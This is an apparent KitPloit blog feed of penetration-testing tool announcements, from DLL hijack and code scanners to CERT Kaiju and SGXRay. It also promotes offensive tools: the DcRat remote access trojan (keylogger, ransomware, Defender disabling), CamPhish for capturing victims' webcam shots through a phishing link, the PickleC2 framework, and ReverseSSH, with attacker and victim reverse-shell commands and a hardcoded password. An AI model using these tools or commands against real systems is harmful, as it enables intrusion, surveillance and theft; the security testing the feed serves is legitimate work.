๐Ÿ”’
There are new articles available, click to refresh the page.
Before yesterdayKitPloit - PenTest & Hacking Tools

DLLHSC - DLL Hijack SCanner A Tool To Assist With The Discovery Of Suitable Candidates For DLL Hijacking

15 March 2021 at 11:30
By: Zion3R


DLL Hijack SCanner - A tool to generate leads and automate the discovery of candidates for DLL Search Order Hijacking


Contents of this repository

This repository hosts the Visual Studio project file for the tool (DLLHSC), the project file for the API hooking functionality (detour), the project file for the payload and last but not least the compiled executables for x86 and x64 architecture (in the release section of this repo). The code was written and compiled with Visual Studio Community 2019.

If you choose to compile the tool from source, you will need to compile the projects DLLHSC, detour and payload. The DLLHSC implements the core functionality of this tool. The detour project generates a DLL that is used to hook APIs. And the payload project generates the DLL that is used as a proof of concept to check if the tested executable can load it via search order hijacking. The generated payload has to be placed in the same directory with DLLHSC and detour named payload32.dll for x86 and payload64.dll for x64 architecture.


Modes of operation

The tool implements 3 modes of operation which are explained below.


Lightweight Mode

Loads the executable image in memory, parses the Import table and then replaces any DLL referred in the Import table with a payload DLL.

The tool places in the application directory only a module (DLL) the is not present in the application directory, does not belong to WinSxS and does not belong to the KnownDLLs.

The payload DLL upon execution, creates a file in the following path: C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSC.tmp as a proof of execution. The tool launches the application and reports if the payload DLL was executed by checking if the temporary file exists. As some executables import functions from the DLLs they load, error message boxes may be shown up when the provided DLL fails to export these functions and thus meet the dependencies of the provided image. However, the message boxes indicate the DLL may be a good candidate for payload execution if the dependencies are met. In this case, additional analysis is required. The title of these message boxes may contain the strings: Ordinal Not Found or Entry Point Not Found. DLLHSC looks for windows that contain these strings, closes them as soon as they shown up and reports the results.


List Modules Mode

Creates a process with the provided executable image, enumerates the modules that are loaded in the address space of this process and reports the results after applying filters.

The tool only reports the modules loaded from the System directory and do not belong to the KnownDLLs. The results are leads that require additional analysis. The analyst can then place the reported modules in the application directory and check if the application loads the provided module instead.


Run-Time Mode

Hooks the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours and reports the modules that are loaded in run-time.

Each time the scanned application calls LoadLibrary and LoadLibraryEx, the tool intercepts the call and writes the requested module in the file C:\Users\%USERNAME%\AppData\Local\Temp\DLLHSCRTLOG.tmp. If the LoadLibraryEx is specifically called with the flag LOAD_LIBRARY_SEARCH_SYSTEM32, no output is written to the file. After all interceptions have finished, the tool reads the file and prints the results. Of interest for further analysis are modules that do not exist in the KnownDLLs registry key, modules that do not exist in the System directory and modules with no full path (for these modules loader applies the normal search order).


Compile and Run Guidance

Should you choose to compile the tool from source it is recommended to do so on Visual Code Studio 2019. In order the tool to function properly, the projects DLLHSC, detour and payload have to be compiled for the same architecture and then placed in the same directory. Please note that the DLL generated from the project payload has to be renamed to payload32.dll for 32-bit architecture or payload64.dll for 64-bit architecture.


Help menu

The help menu for this application

NAME
dllhsc - DLL Hijack SCanner

SYNOPSIS
dllhsc.exe -h

dllhsc.exe -e <executable image path> (-l|-lm|-rt) [-t seconds]

DESCRIPTION
DLLHSC scans a given executable image for DLL Hijacking and reports the results

It requires elevated privileges

OPTIONS
-h, --help
display this help menu and exit

-e, --executable-image
executable image to scan

-l, --lightweight
parse the import table, attempt to launch a payload and report the results

-lm, --list-modules
list loaded modules that do not exist in the application's directory

-rt, --runtime-load
display modules loaded in run-time by hooking LoadLibrary and LoadLibraryEx APIs

-t, --timeout
number of seconds to wait f or checking any popup error windows - defaults to 10 seconds


Example Runs

This section provides examples on how you can run DLLHSC and the results it reports. For this purpose, the legitimate Microsoft utility OleView.exe (MD5: D1E6767900C85535F300E08D76AAC9AB) was used. For better results, it is recommended that the provided executable image is scanned within its installation directory.

The flag -l parses the import table of the provided executable, applies filters and attempts to weaponize the imported modules by placing a payload DLL in the application's current directory. The scanned executable may pop an error box when dependencies for the payload DLL (exported functions) are not met. In this case, an error message box is poped. DLLHSC by default checks for 10 seconds if a message box was opened or for as many seconds as specified by the user with the flag -t. An error message box indicates that if dependencies are met, the module can be weaponized.

The following screenshot shows the error message box generated when OleView.dll loads the payload DLL :



The tool waits for a maximum timeframe of 10 seconds or -t seconds to make sure the process initialization has finished and any message box has been generated. It then detects the message box, closes it and reports the result:



The flag -lm launches the provided executable and prints the modules it loads that do not belong in the KnownDLLs list neither are WinSxS dependencies. This mode is aimed to give an idea of DLLs that may be used as payload and it only exists to generate leads for the analyst.



The flag -rt prints the modules the provided executable image loads in its address space when launched as a process. This is achieved by hooking the LoadLibrary and LoadLibraryEx APIs via Microsoft Detours.



Feedback

For any feedback on this tool, please use the GitHub Issues section.



Retoolkit - Reverse Engineer's Toolkit

26 March 2021 at 11:30
By: Zion3R


This is a collection of tools you may like if you are interested on reverse engineering and/or malware analysis on x86 and x64 Windows systems. After installing this toolkit you'll have a folder in your desktop with shortcuts to RE tools like these:


Why do I need it?

You don't. Obviously, you can download such tools from their own website and install them by yourself in a new VM. But if you download retoolkit, it can probably save you some time. Additionally, the tools come pre-configured so you'll find things like x64dbg with a few plugins, command-line tools working from any directory, etc. You may like it if you're setting up a new analysis VM.


Download

The *.iss files you see here are the source code for our setup program built with Inno Setup. To download the real thing, you have to go to the Releases section and download the setup program.


Included tools

Check the wiki.



Is it safe to install it in my environment?

I don't know. Some included tools are not open source and come from shady places. You should use it exclusively in virtual machines and under your own responsibility.


Can you add tool X?

It depends. The idea is to keep it simple. We won't add a tool just because it's not here yet. But if you think there's a good reason to do so, and the license allows us to redistribuite the software, please file a request here.



Php_Code_Analysis - San your PHP code for vulnerabilities


This script will scan your code

the script can find

  1. check_file_upload issues
  2. host_header_injection
  3. SQl injection
  4. insecure deserialization
  5. open_redirect
  6. SSRF
  7. XSS
  8. LFI
  9. command_injection

features
  1. fast
  2. simple report

usage:
python code.py <file name> >>> this will scan one file
python code.py >>> this will scan full folder (.)
python code.py <path> >>> scan full folder

Kaiju - A Binary Analysis Framework Extension For The Ghidra Software Reverse Engineering Suite


CERT Kaiju is a collection of binary analysis tools for Ghidra.

This is a Ghidra/Java implementation of some features of the CERT Pharos Binary Analysis Framework, particularly the function hashing and malware analysis tools, but is expected to grow new tools and capabilities over time.

As this is a new effort, this implementation does not yet have full feature parity with the original C++ implementation based on ROSE; however, the move to Java and Ghidra has actually enabled some new features not available in the original framework -- notably, improved handling of non-x86 architectures. Since some significant re-architecting of the framework and tools is taking place, and the move to Java and Ghidra enables different capabilities than the C++ implementation, the decision was made to utilize new branding such that there would be less confusion between implementations when discussing the different tools and capabilities.

Our intention for the near future is to maintain both the original Pharos framework as well as Kaiju, side-by-side, since both can provide unique features and capabilities.

CAVEAT: As a prototype, there are many issues that may come up when evaluating the function hashes created by this plugin. For example, unlike the Pharos implementation, Kaiju's function hashing module will create hashes for very small functions (e.g., ones with a single instruction like RET causing many more unintended collisions). As such, analytical results may vary between this plugin and Pharos fn2hash.


Quick Installation

Pre-built Kaiju packages are available. Simply download the ZIP file corresponding with your version of Ghidra and install according to the instructions below. It is recommended to install via Ghidra's graphical interface, but it is also possible to manually unzip into the appropriate directory to install.

CERT Kaiju requires the following runtime dependencies:

NOTE: It is also possible to build the extension package on your own and install it. Please see the instructions under the "Build Kaiju Yourself" section below.


Graphical Installation

Start Ghidra, and from the opening window, select from the menu: File > Install Extension. Click the plus sign at the top of the extensions window, navigate and select the .zip file in the file browser and hit OK. The extension will be installed and a checkbox will be marked next to the name of the extension in the window to let you know it is installed and ready.

The interface will ask you to restart Ghidra to start using the extension. Simply restart, and then Kaiju's extra features will be available for use interactively or in scripts.

Some functionality may require enabling Kaiju plugins. To do this, open the Code Browser then navigate to the menu File > Configure. In the window that pops up, click the Configure link below the "CERT Kaiju" category icon. A pop-up will display all available publicly released Kaiju plugins. Check any plugins you wish to activate, then hit OK. You will now have access to interactive plugin features.

If a plugin is not immediately visible once enabled, you can find the plugin underneath the Window menu in the Code Browser.

Experimental "alpha" versions of future tools may be available from the "Experimental" category if you wish to test them. However these plugins are definitely experimental and unsupported and not recommended for production use. We do welcome early feedback though!


Manual Installation

Ghidra extensions like Kaiju may also be installed manually by unzipping the extension contents into the appropriate directory of your Ghidra installation. For more information, please see The Ghidra Installation Guide.


Usage

Kaiju's tools may be used either in an interactive graphical way, or via a "headless" mode more suited for batch jobs. Some tools may only be available for graphical or headless use, by the nature of the tool.


Interactive Graphical Interface

Kaiju creates an interactive graphical interface (GUI) within Ghidra utilizing Java Swing and Ghidra's plugin architecture.

Most of Kaiju's tools are actually Analysis plugins that run automatically when the "Auto Analysis" option is chosen, either upon import of a new executable to disassemble, or by directly choosing Analysis > Auto Analyze... from the code browser window. You will see several CERT Analysis plugins selected by default in the Auto Analyze tool, but you can enable/disable any as desired.

The Analysis tools must be run before the various GUI tools will work, however. In some corner cases, it may even be helpful to run the Auto Analysis twice to ensure all of the metadata is produced to create correct partitioning and disassembly information, which in turn can influence the hashing results.

Analyzers are automatically run during Ghidra's analysis phase and include:

  • DisasmImprovements = improves the function partitioning of the disassembly compared to the standard Ghidra partitioning.
  • Fn2Hash = calculates function hashes for all functions in a program and is used to generate YARA signatures for programs.

The GUI tools include:

  • Function Hash Viewer = a plugin that displays an interactive list of functions in a program and several types of hashes. Analysts can use this to export one or more functions from a program into YARA signatures.
    • Select Window > CERT Function Hash Viewer from the menu to get started with this tool if it is not already visible. A new window will appear displaying a table of hashes and other data. Buttons along the top of the window can refresh the table or export data to file or a YARA signature. This window may also be docked into the main Ghidra CodeBrowser for easier use alongside other plugins. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.
  • OOAnalyzer JSON Importer = a plugin that can load, parse, and apply Pharos-generated OOAnalyzer results to object oriented C++ executables in a Ghidra project. When launched, the plugin will prompt the user for the JSON output file produced by OOAnalyzer that contains information about recovered C++ classes. After loading the JSON file, recovered C++ data types and symbols found by OOAnalyzer are updated in the Ghidra Code Browser. The plugin's design and implementation details are described in our SEI blog post titled Using OOAnalyzer to Reverse Engineer Object Oriented Code with Ghidra.
    • Select CERT > OOAnalyzer Importer from the menu to get started with this tool. A simple dialog popup will ask you to locate the JSON file you wish to import. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.

Command-line "Headless" Mode

Ghidra also supports a "headless" mode allowing tools to be run in some circumstances without use of the interactive GUI. These commands can therefore be utilized for scripting and "batch mode" jobs of large numbers of files.

The headless tools largely rely on Ghidra's GhidraScript functionality.

Headless tools include:

  • fn2hash = automatically run Fn2Hash on a given program and export all the hashes to a CSV file specified
  • fn2yara = automatically run Fn2Hash on a given program and export all hash data as YARA signatures to the file specified
  • fnxrefs = analyze a Program and export a list of Functions based on entry point address that have cross-references in data or other parts of the Program

A simple shell launch script named kaijuRun has been included to run these headless commands for simple scenarios, such as outputing the function hashes for every function in a single executable. Assuming the GHIDRA_INSTALL_DIR variable is set, one might for example run the launch script on a single executable as follows:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun fn2hash example.exe

This command would output the results to an automatically named file as example.exe.Hashes.csv.

Basic help for the kaijuRun script is available by running:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun --help

Please see docs/HeadlessKaiju.md file in the repository for more information on using this mode and the kaijuRun launcher script.


Further Documentation and Help

More comprehensive documentation and help is available, in one of two formats.

See the docs/ directory for Markdown-formatted documentation and help for all Kaiju tools and components. These documents are easy to maintain and edit and read even from a command line.

Alternatively, you may find the same documentation in Ghidra's built-in help system. To access these help docs, from the Ghidra menu, go to Help > Contents and then select CERT Kaiju from the tree navigation on the left-hand side of the help window.

Please note that the Ghidra Help documentation is the exact same content as the Markdown files in the docs/ directory; thanks to an in-tree gradle plugin, gradle will automatically parse the Markdown and export into Ghidra HTML during the build process. This allows even simpler maintenance (update docs in just one place, not two) and keeps the two in sync.

All new documentation should be added to the docs/ directory.


Building Kaiju Yourself Using Gradle

Alternately to the pre-built packages, you may compile and build Kaiju yourself.


Build Dependencies

CERT Kaiju requires the following build dependencies:

  • Ghidra 9.1+ (9.2+ recommended)
  • gradle 6.4+ (latest gradle 6.x recommended, 7.x not supported)
  • GSON 2.8.6
  • Java 11+ (we recommend OpenJDK 11)

NOTE ABOUT GRADLE: Please ensure that gradle is building against the same JDK version in use by Ghidra on your system, or you may experience installation problems.

NOTE ABOUT GSON: In most cases, Gradle will automatically obtain this for you. If you find that you need to obtain it manually, you can download gson-2.8.6.jar and place it in the kaiju/lib directory.


Build Instructions

Once dependencies are installed, Kaiju may be built as a Ghidra extension by using the gradle build tool. It is recommended to first set a Ghidra environment variable, as Ghidra installation instructions specify.

In short: set GHIDRA_INSTALL_DIR as an environment variable first, then run gradle without any options:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle

NOTE: Your Ghidra install directory is the directory containing the ghidraRun script (the top level directory after unzipping the Ghidra release distribution into the location of your choice.)

If for some reason your environment variable is not or can not be set, you can also specify it on the command like with:

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>

In either case, the newly-built Kaiju extension will appear as a .zip file within the dist/ directory. The filename will include "Kaiju", the version of Ghidra it was built against, and the date it was built. If all goes well, you should see a message like the following that tells you the name of your built plugin.

Created ghidra_X.Y.Z_PUBLIC_YYYYMMDD_kaiju.zip in <path/to>/kaiju/dist

where X.Y.Z is the version of Ghidra you are using, and YYYYMMDD is the date you built this Kaiju extension.


Optional: Running Tests With AUTOCATS

While not required, you may want to use the Kaiju testing suite to verify proper compilation and ensure there are no regressions while testing new code or before you install Kaiju in a production environment.

In order to run the Kaiju testing suite, you will need to first obtain the AUTOCATS (AUTOmated Code Analysis Testing Suite). AUTOCATS contains a number of executables and related data to perform tests and check for regressions in Kaiju. These test cases are shared with the Pharos binary analysis framework, therefore AUTOCATS is located in a separate git repository.

Clone the AUTOCATS repository with:

git clone https://github.com/cmu-sei/autocats

We recommend cloning the AUTOCATS repository into the same parent directory that holds Kaiju, but you may clone it anywhere you wish.

The tests can then be run with:

gradle -PKAIJU_AUTOCATS_DIR=path/to/autocats/dir test

where of course the correct path is provided to your cloned AUTOCATS repository directory. If cloned to the same parent directory as Kaiju as recommended, the command would look like:

gradle -PKAIJU_AUTOCATS_DIR=../autocats test

The tests cannot be run without providing this path; if you do forget it, gradle will abort and give an error message about providing this path.

Kaiju has a dependency on JUnit 5 only for running tests. Gradle should automatically retrieve and use JUnit, but you may also download JUnit and manually place into lib/ directory of Kaiju if needed.

You will want to run the update command whenever you pull the latest Kaiju source code, to ensure they stay in sync.


First-Time "Headless" Gradle-based Installation

If you compiled and built your own Kaiju extension, you may alternately install the extension directly on the command line via use of gradle. Be sure to set GHIDRA_INSTALL_DIR as an environment variable first (if you built Kaiju too, then you should already have this defined), then run gradle as follows:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle install

or if you are unsure if the environment variable is set,

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir> install

Extension files should be copied automatically. Kaiju will be available for use after Ghidra is restarted.

NOTE: Be sure that Ghidra is NOT running before using gradle to install. We are aware of instances when the caching does not appear to update properly if installed while Ghidra is running, leading to some odd bugs. If this happens to you, simply exit Ghidra and try reinstalling again.


Consider Removing Your Old Installation First

It might be helpful to first completely remove any older install of Kaiju before updating to a newer release. We've seen some cases where older versions of Kaiju files get stuck in the cache and cause interesting bugs due to the conflicts. By removing the old install first, you'll ensure a clean re-install and easy use.

The gradle build process now can auto-remove previous installs of Kaiju if you enable this feature. To enable the autoremove, add the "KAIJU_AUTO_REMOVE" property to your install command, such as (assuming the environment variable is probably set as in previous section):

gradle -PKAIJU_AUTO_REMOVE install

If you'd prefer to remove your old installation manually, perform a command like:

rm -rf $GHIDRA_INSTALL_DIR/Extensions/Ghidra/*kaiju*.zip $GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju


DcRat - A Simple Remote Tool Written In C#

12 July 2021 at 21:30
By: Zion3R


DcRat is a simple remote tool written in C#


Introduction

Features
  • TCP connection with certificate verification, stable and security
  • Server IP port can be archived through link
  • Multi-Server,multi-port support
  • Plugin system through Dll, which has strong expansibility
  • Super tiny client size (about 40~50K)
  • Data transform with msgpack (better than JSON and other formats)
  • Logging system recording all events

Functions
  • Remote shell
  • Remote desktop
  • Remote camera
  • Registry Editor
  • File management
  • Process management
  • Netstat
  • Remote recording
  • Process notification
  • Send file
  • Inject file
  • Download and Execute
  • Send notification
  • Chat
  • Open website
  • Modify wallpaper
  • Keylogger
  • File lookup
  • DDOS
  • Ransomware
  • Disable Windows Defender
  • Disable UAC
  • Password recovery
  • Open CD
  • Lock screen
  • Client shutdown/restart/upgrade/uninstall
  • System shutdown/restart/logout
  • Bypass Uac
  • Get computer information
  • Thumbnails
  • Auto task
  • Mutex
  • Process protection
  • Block client
  • Install with schtasks
  • etc

Deployment
  • Build๏ผšvs2019
  • Runtime๏ผš
Project Runtime
Server .NET Framework 4.61
Client and others .NET Framework 4.0

Support
  • The following systems (32 and 64 bit) are supported
    • Windows XP SP3
    • Windows Server 2003
    • Windows Vista
    • Windows Server 2008
    • Windows 7
    • Windows Server 2012
    • Windows 8/8.1
    • Windows 10

TODO
  • Password recovery and other stealer (only chrome and edge are supported now)
  • Reverse Proxy
  • Hidden VNC
  • Hidden RDP
  • Hidden Browser
  • Client Map
  • Real time Microphone
  • Some fun function
  • Information Collection(Maybe with UI)
  • Support unicode in Remote Shell
  • Support Folder Download
  • Support more ways to install Clients
  • โ€ฆโ€ฆ

Compile

Open the project in Visual Studio 2019 and press CTRL+SHIFT+B.


Download

Press here to download the lastest release.


Attention

ๆˆ‘๏ผˆ็ฐž็ด”๏ผ‰ๅฏนๆ‚จ็”ฑไฝฟ็”จๆˆ–ไผ ๆ’ญ็ญ‰็”ฑๆญค่ฝฏไปถๅผ•่ตท็š„ไปปไฝ•่กŒไธบๅ’Œ/ๆˆ–ๆŸๅฎณไธๆ‰ฟๆ‹…ไปปไฝ•่ดฃไปปใ€‚ๆ‚จๅฏนไฝฟ็”จๆญค่ฝฏไปถ็š„ไปปไฝ•่กŒไธบๆ‰ฟๆ‹…ๅ…จ้ƒจ่ดฃไปป๏ผŒๅนถๆ‰ฟ่ฎคๆญค่ฝฏไปถไป…็”จไบŽๆ•™่‚ฒๅ’Œ็ ”็ฉถ็›ฎ็š„ใ€‚ไธ‹่ฝฝๆœฌ่ฝฏไปถๆˆ–่ฝฏไปถ็š„ๆบไปฃ็ ๏ผŒๆ‚จ่‡ชๅŠจๅŒๆ„ไธŠ่ฟฐๅ†…ๅฎนใ€‚
I (qwqdanchun) am not responsible for any actions and/or damages caused by your use or dissemination of the software. You are fully responsible for any use of the software and acknowledge that the software is only used for educational and research purposes. If you download the software or the source code of the software, you will automatically agree with the above content.


Thanks


CamPhish - Grab Cam Shots From Target'S Phone Front Camera Or PC Webcam Just Sending A Link.

16 August 2021 at 12:30
By: Zion3R

Grab cam shots from target's phone front camera or PC webcam just sending a link.ย 


What is CamPhish?

CamPhish is techniques to take cam shots of target's phone fornt camera or PC webcam. CamPhish Hosts a fake website on in built PHP server and uses ngrok & serveo to generate a link which we will forward to the target, which can be used on over internet. website asks for camera permission and if the target allows it, this tool grab camshots of target's device


Features

In this tool I added two automatic webpage templates for engaged target on webpage to get more picture of cam

  • Festival Wishing
  • Live YouTube TV

simply enter festival name or youtube's video ID


This Tool Tested On :
  • Kali Linux
  • Termux
  • MacOS
  • Ubuntu
  • Perrot Sec OS

Installing and requirements

This tool require PHP for webserver, SSH or serveo link. First run following command on your terminal

openssh git wget ">
apt-get -y install php openssh git wget

Installing (Kali Linux/Termux):
git clone https://github.com/techchipnet/CamPhish
cd CamPhish
bash camphish.sh

CamPhish is created to help in penetration testing and it's not responsible for any misuse or illegal purposes.

CamPhish is inspired by https://github.com/thelinuxchoice/ Big thanks to @thelinuxchoice



PickleC2 - A Post-Exploitation And Lateral Movements Framework

16 August 2021 at 21:30
By: Zion3R

PickleC2 is a post-exploitation and lateral movements framework.


Documentation

ReadTheDocs


Overview

PickleC2 is a simple C2 framework written in python3 used to help the community in Penetration Testers in their red teaming engagements.

PickleC2 has the ability to import your own PowerShell module for Post-Exploitation and Lateral Movement or automate the process.


Features

There is a one implant for the beta version which is powershell.

  1. PickleC2 is fully encrypted communications, protecting the confidentiality and integrity of the C2 traffic even when communicating over HTTP.

  2. PickleC2 can handle multiple listeners and implants with no issues

  3. PickleC2 supports anyone who would like to add his own PowerShell Module


Future Features

In the up coming updates pickle will support:

  1. Go Implant

  2. Powershell-Less Implant that donโ€™t use System.Management.Automation.dll.

  3. Malleable C2 Profile will be supported.

  4. HTTPS communications will be supported. NOTE: Even HTTP communications is fully encrypted.


Install
git clone https://github.com/xRET2pwn/PickleC2.git
cd PickleC2
sudo apt install python3 python3-pip
python3 -m pip install -r requirements.txt
./run.py


ReverseSSH - Statically-linked Ssh Server With Reverse Shell Functionality For CTFs And Such

17 August 2021 at 12:30
By: Zion3R


A statically-linked ssh server with a reverse connection feature for simple yet powerful remote access. Most useful during HackTheBox challenges, CTFs or similar.

Has been developed and was extensively used during OSCP exam preparation.

Get the latest Release


Features

Catching a reverse shell with netcat is cool, sure, but who hasn't accidentally closed a reverse shell with a keyboard interrupt due to muscle memory? Besides their fragility, such shells are also often missing convenience features such as fully interactive access, TAB-completion or history.

Instead, you can go the way to simply deploy the lightweight ssh server (<1.5MB) reverse-ssh onto the target, and use additional commodities such as file transfer and port forwarding!

ReverseSSH tries to bridge the gap between initial foothold on a target and full local privilege escalation. Its main strengths are the following:

  • Fully interactive shell access (check windows caveats below)
  • File transfer via sftp
  • Local / remote / dynamic port forwarding
  • Can be used as bind- and reverse-shell
  • Supports Unix and Windows operating systems

Windows caveats

A fully interactive powershell on windows relies on Windows Pseudo Console ConPTY and thus requires at least Win10 Build 17763. On earlier versions you can still get an interactive reverse shell that can't handle virtual terminal codes such as arrow keys or keyboard interrupts. In such cases you have to append the cmd command, i.e. ssh <OPTIONS> <IP> cmd.

You can achieve full interactive shell access for older windows versions by dropping ssh-shellhost.exe from OpenSSH for Windows in the same directory as reverse-ssh and then use flag -s ssh-shellhost.exe. This will pipe all traffic through ssh-shellhost.exe, which mimics a pty and transforms all virtual terminal codes such that windows can understand.


Requirements

Simply executing the provided binaries only relies on golang system requirements.

In short:

  • Linux: kernel version 2.6.23 and higher
  • Windows: Windows Server 2008R2 and higher or Windows 7 and higher

Compiling additionally requires the following:

  • golang version 1.15
  • optionally upx for compression (e.g. apt install upx-ucl)

Usage

Once reverse-ssh is running, you can connect with any username and the default password letmeinbrudipls, the ssh key or whatever you specified during compilation. After all, it is just an ssh server:

port forwarding as SOCKS proxy on port 9050 ssh -p <RPORT> -D 9050 <RHOST> ">
# Fully interactive shell access
ssh -p <RPORT> <RHOST>

# Simple command execution
ssh -p <RPORT> <RHOST> whoami

# Full-fledged file transfers
sftp -P <RPORT> <RHOST>

# Dynamic port forwarding as SOCKS proxy on port 9050
ssh -p <RPORT> -D 9050 <RHOST>

Simple bind shell scenario
# Victim
victim$./reverse-ssh

# Attacker (default password: letmeinbrudipls)
attacker$ssh -p 31337 <LHOST>

Simple reverse shell scenario
# On attacker (get ready to catch the incoming request;
# can be omitted if you already have an ssh daemon running, e.g. OpenSSH)
attacker$./reverse-ssh -l :<LPORT>

# On victim
victim$./reverse-ssh -p <LPORT> <LHOST>
# or in case of an ssh daemon listening at port 22 with user/pass authentication
victim$./reverse-ssh <USER>@<LHOST>

# On attacker (default password: letmeinbrudipls)
attacker$ssh -p 8888 127.0.0.1
# or with ssh config from below
attacker$ssh target

In the end it's plain ssh, so you could catch the remote port forwarding call coming from the victim's machine with your openssh daemon listening on port 22. Just prepend <USER>@ and provide the password once asked to do so. Dialling home currently is password only, because I didn't feel like baking a private key in there as well yet...

For even more convenience, add the following to your ~/.ssh/config, copy the ssh private key to ~/.ssh/ and simply call ssh target or sftp target afterwards:

Host target
Hostname 127.0.0.1
Port 8888
IdentityFile ~/.ssh/id_reverse-ssh
IdentitiesOnly yes
StrictHostKeyChecking no
UserKnownHostsFile /dev/null

Full usage
reverseSSH v1.1.0  Copyright (C) 2021  Ferdinor <[email protected]>

Usage: reverse-ssh [options] [<user>@]<target>

Examples:
Bind:
reverse-ssh
reverse-ssh -v -l :4444
Reverse:
reverse-ssh 192.168.0.1
reverse-ssh [email protected]
reverse-ssh -p 31337 192.168.0.1
reverse-ssh -v -b 0 [email protected]

Options:
-s, Shell to use for incoming connections, e.g. /bin/bash; (default: /bin/bash)
for windows this can only be used to give a path to 'ssh-shellhost.exe' to
enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory)
-l, Bind scenario only: listen at this address:port (default: :31337)
-p, Reverse scenario only: ssh port at home (default: 22)
-b, Reverse scenario only: bind to this port after dialling home (default: 8888)
- v, Emit log output

<target>
Optional target which enables the reverse scenario. Can be prepended with
<user>@ to authenticate as a different user than 'reverse' while dialling home.

Credentials:
Accepting all incoming connections from any user with either of the following:
* Password "letmeinbrudipls"
* PubKey "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlbJwr+ueQ0gojy4QWr2sUWcNC/Y9eV9RdY3PLO7Bk/ Brudi"

Build instructions

Make sure to install the above requirements such as golang in a matching version and set it up correctly. Afterwards, you can compile with make, which will create static binaries in bin. Use make compressed to pack the binaries with upx to further reduce their size.

make

# or to additionally created binaries packed with upx
make compressed

You can also specify a different default shell (RS_SHELL), a personalized password (RS_PASS) or an authorized key (RS_PUB) when compiling:

ssh-keygen -t ed25519 -f id_reverse-ssh

RS_SHELL="/bin/sh" RS_PASS="secret" RS_PUB="$(cat id_reverse-ssh.pub)" make compressed

Building for different operating systems or architectures

By default, reverse-ssh is compiled for your current OS and architecture, as well as for linux and windows in x86 and x64. To compile for other architectures or another OS you can provide environmental variables which match your target, e.g. for linux/arm64:

GOARCH=arm64 GOOS=linux make compressed

A list of available targets in format OS/arch can be obtained via go tool dist list.


Contribute

Is a mind-blowing feature missing? Anything not working as intended?

Create an issue or pull request!



SGXRay - Automating Vulnerability Detection for SGX Apps

17 August 2021 at 21:30
By: Zion3R


Intel SGX protects isolated application logic and sensitive data inside an enclave with hardware-based memory encryption. To use such hardware-based security mechanism requires a strict programming model on memory usage๏ผŒ with complex APIs in and out the enclave boundary. Enclave developers are required to apply careful programming practices to ensure enclave security, especially when dealing with data flowing across the enclave's trusted boundary. Trusted boundary violations can further cause memory corruption and are exploitable by attackers to retrieve and manipulate protected data. Currently, no publicly available tools can effectively detect such issues for real-world enclaves.


SGXRay is an automated reasoning tool based on the SMACK verifier that automatically detects SGX enclave bugs rooting from violations of trusted boundaries. It recompiles a given enclave code and starts the analysis from a user-specified enclave function entry. After the analysis, it either finds an invalid pointer handling inside an SGX software stack such as deferencing unchecked pointer inside an enclave, invalid memory deallocation, and TOCTOU bugs, or prove the absense of such bugs up to a user-specified loop and recursion bound.

Currently, SGXRay SGX applications built on two SGX SDKs: Intel SGX SDK and openenclave SDK. Users can opt in SDK code for a more thorough analysis.


Getting Started

For a quick start, please follow a step-by-step tutorial on using SGXRay over one of the demo examples here.

The following figure demonstrates the workflow of SGXRay.

Running SGXRay is a two-step process. The first step is to obtain an LLVM IR file for the application. The second step is to invoke SGXRay CLI for verification.

For the first step, we provide two Docker images for each SDK, respectively.

docker pull baiduxlab/sgx-ray-frontend-intel
docker pull baiduxlab/sgx-ray-frontend-oe

The detailed instructions to run the first step can be found here.

For the second step, we also provide a Docker image.

docker pull baiduxlab/sgx-ray-distro:latest

The detailed instructions to run the second step can be found here.


Docker Build

We provide a Dockerfile that builds the image for the verification step.

git clone https://github.com/baiduxlab/sgxray.git && cd sgxray
docker build . -t sgx-ray-distro-local --build-arg hostuid=$UID -f Dockerfiles/Dockerfile-CLI

Successful build should produce an image named sgx-ray-distro-local which has an user user with the same user id as the host account.


Documentations

Detailed documentations of SGXRay can be found as follows.



AuraBorealisApp - Do You Know What's In Your Python Packages? A Tool For Visualizing Python Package Registry Security Audit Data

18 August 2021 at 12:30
By: Zion3R


AuraBorealis is a web application for visualizing anomalous and potentially malicious code in Python package registries. It uses security audit data produced by scanning the Python Package Index (PyPI) via Aura, a static analysis designed for large scale security auditing of Python packages. The current tool is a proof-of-concept, and includes some live Aura data, as well as some mockup data for demo purposes.

Current features include:

  • Scanning the entire python package registry to:

    • List packages with the highest number of security warnings, sorted by Aura warning type
    • List packages sorted by the total and unique count of warnings
    • List packages by their overall severity score
  • Displaying security warnings for an individual package, sorted by criticality

  • Visualize the line numbers and lines of code in files generating security warnings for a specific package

  • Compare two packages for security warnings


Instructions

Turn on your VPN (at IQT)

Clone the repository.

git clone https://github.com/IQTLabs/AuraBorealisApp.git

Navigate to aura-borealis-flask-app directory.

cd aura-borealis-flask-app

Install dependencies.

pip install -r requirements.txt

Run the app.

python app.py

Navigate to the URL http://0.0.0.0:7000/ via a browser.


Feature Roadmap
  • Compare a package to a benchmark profile of packages of similar purpose for security warnings
  • Compare different versions of the same package for security warnings
  • List packages that have changes in their warnings and/or severity score between two dates
  • Ability to scan an internal package/registry that's not public on PyPI
  • Display an analysis of permissions (does this package make a network connection? Does this package require OS-level library permissions?)

Contact Information

[email protected] (John Speed Meyers, IQT Labs, Secure Code Reuse project lead).

The lead developer and creator of Aura is Martin Carnogusky of sourcecode.ai.


Related Work


Jsleak - A Go Code To Detect Leaks In JS Files Via Regex Patterns

18 August 2021 at 21:30
By: Zion3R


jsleak is a tool to identify sensitive data in JS files through regex patterns. Although it's built for this, you can use it to identify anything as long as you have a regex pattern for it.


How to install

Directly:

{your package manager} install pkg-config libpcre++-dev
go get github.com/0xTeles/jsleak/v2/jsleak

Compiled: release page


How to use
Usage of jsleak:
-json string
[+] Json output file
-pattern string
[+] File contains patterns to test
-verbose
[+] Verbose Mode

Demo
